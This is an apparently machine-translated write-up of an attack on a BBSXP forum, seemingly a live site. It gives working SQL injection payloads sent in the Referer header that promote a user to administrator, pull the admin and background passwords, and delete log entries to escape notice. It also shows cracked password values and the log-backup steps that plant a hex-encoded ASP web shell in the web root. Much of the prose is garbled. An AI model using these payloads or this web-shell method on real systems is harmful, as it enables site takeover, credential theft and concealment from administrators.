The vulnerability exists in the file setup. asp
The first part of the
Registration－>login->post->edit->capture->package->promoted to administrator->change background-password - >login backend->WEBSHELL
Here I set the password as: ttfct1 ,NC submitted successfully provided for the administrator. With password: ttfct1 landing in the background. Successfully get WEBSHELL, the successful backup, get WEBSHELL success.
WEBSHELL acquisition of two methods A: background upload increase htr II: log backup, a total of 4 steps
The second part of the
Detection official website I have registered well, the user is sina147 Registration－>login->post->edit->capture In order not to attract the Administrators attention, we directly obtain the administrator password and background the password, and then log in the background.
Sorry, just a little problem, power outage. Continue to, the capture, modify, and I checked, yuzi is the administrator.
yuzi password 5D4D89BEA718BEE10686FB053E86F13B->0 8 0 5 3 2 7 7 9 Background login password: 531BC3E862F67DC2BAA871EABDE81A4F->0 8 0 5 3 2 4 4 9
Landing back This document request a physical path D:\www\bbs.yuzi.net\Admin_other.asp with this, it is a chance to get WEBSHELL. Behind the animation is not made, we play it.
Promoted to administrator: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserRoleID=1 where username='sina'--
Get the administrator password(i.e. a password: a Referer: http://127.0.0.1',", ",'modify post success');update bbsxp_users set UserMail= (select userpass from bbsxp_users where username='yuzi') where username='sina147'
Get back the password(i.e., the secondary password, of: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'
Change the Admin Password(secondary password Referer: http://127.0.0.1',",",'modify post success');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')
Delete log: Referer: http://127.0.0.1',",",'modify post success');delete from bbsxp_log where username='sina147'
LOG backup Backup address: C:\Inetpub\wwwroot\ttfct.asp
The first step create table [dbo]. [shit_tmp] ([cmd] [image])
The second step declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate
The third step insert into shit_tmp values(0x3C25657865637574652872657175657374282261222929253e)
The fourth step declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005c0077007700770072006f006f0074005c00740074006600630074002e00610073007000 backup log @a to disk=@s with init,no_truncate
The fifth step Drop table [shit_tmp]